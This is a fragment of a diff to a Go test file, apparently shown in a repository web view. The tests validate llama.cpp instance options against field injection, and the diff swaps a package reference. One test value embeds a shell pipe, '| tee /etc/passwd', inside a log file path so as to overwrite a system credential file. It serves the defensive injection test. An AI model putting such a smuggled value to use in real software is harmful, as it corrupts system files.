LogFile: "/tmp/log.txt | tee /etc/passwd",
|
||||||
},
|
},
|
||||||
@@ -223,7 +222,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
|||||||
name: "all safe fields",
|
name: "all safe fields",
|
||||||
options: &instance.Options{
|
options: &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
HFRepo: "microsoft/DialoGPT-medium",
|
HFRepo: "microsoft/DialoGPT-medium",
|
||||||
LogFile: "/tmp/llama.log",
|
LogFile: "/tmp/llama.log",
|
||||||
@@ -252,7 +251,7 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
|
|||||||
MaxRestarts: testutil.IntPtr(5),
|
MaxRestarts: testutil.IntPtr(5),
|
||||||
RestartDelay: testutil.IntPtr(10),
|
RestartDelay: testutil.IntPtr(10),
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
GPULayers: 32,
|
GPULayers: 32,
|
||||||
CtxSize: 4096,
|
CtxSize: 4096,
|
||||||
|
|||||||
Reference in New Issue
Block a user